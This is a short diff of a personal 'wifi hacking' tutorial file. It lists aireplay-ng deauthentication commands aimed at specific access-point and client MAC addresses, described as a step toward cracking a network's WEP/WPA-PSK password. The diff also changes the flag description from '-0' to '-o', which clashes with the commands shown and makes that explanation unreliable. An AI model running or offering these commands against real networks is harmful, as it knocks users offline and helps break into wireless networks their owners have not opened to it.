sherwin-ad/my_tutorials/hacking/wifi_hacking.md

 ```
 # aireplay-ng -0 0 -a BC:98:89:9D:3C:58 -c e4:b3:18:08:c9:79 wlan0mon

+# aireplay-ng -0 10 -a 80:35:C1:13:C1:2C wlan0mon

+# aireplay-ng --deauth 10 -a [router bssid] interface
 ```

-- -0  sets the count of number of deauthentication packets to send to the connected clients, station(s).
+- -o sets the count of number of deauthentication packets to send to the connected clients, station(s).
 - -a  specify or set Access Point MAC Address, this case the BSSID of the WiFi you wish to crack its WEP and WPA-PSK Keys to get its password.
 - -c  specify or set destination MAC address, in this case is the Device, STATION you want to deauthenticate from the WiFi network.
 - wlan0mon  specifies the interface on promiscuous mode.